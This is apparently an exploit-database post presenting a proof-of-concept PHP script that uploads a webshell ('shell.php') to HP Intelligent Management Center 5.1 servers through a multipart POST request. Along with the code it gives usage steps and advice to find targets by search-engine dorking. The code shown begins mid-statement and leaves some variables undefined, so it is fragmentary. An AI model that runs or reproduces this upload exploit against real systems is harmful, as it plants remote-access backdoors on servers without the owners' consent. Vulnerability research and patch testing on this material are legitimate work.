============================================================================================================================================= | # Title : HP Intelligent Management Center 5.1 E0202 Shell Upload Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://support.hpe.com/hpesc/public/docDisplay?docId=c03177356 | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: Upload a malicious PHP file (such as a Webshell) to the server. [+] save code as poc.php. [+] Set Target : line 54 [+] USage : php poc.php [+] PayLoad : [ "method" => "POST", "header" => "Content-Type: multipart/form-data; boundary=$boundary\r\n", "content" => $data ] ]; $url = "http://$ip:$port$target_uri/$upload_path"; echo "$ip:$port - Uploading file...\n"; $response = @file_get_contents($url, false, stream_context_create($opts)); if ($response !== false) { echo "$ip:$port - File uploaded successfully to $url\n"; } else { echo "$ip:$port - File upload failed\n"; } } // Example usage $ip = "192.168.1.1"; $port = 8080; $target_uri = "/imc"; $upload_path = "uploads/shell.php"; // Adjust this path as needed $local_file = "shell.php"; // Your payload file upload_file($ip, $port, $target_uri, $upload_path, $local_file); ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================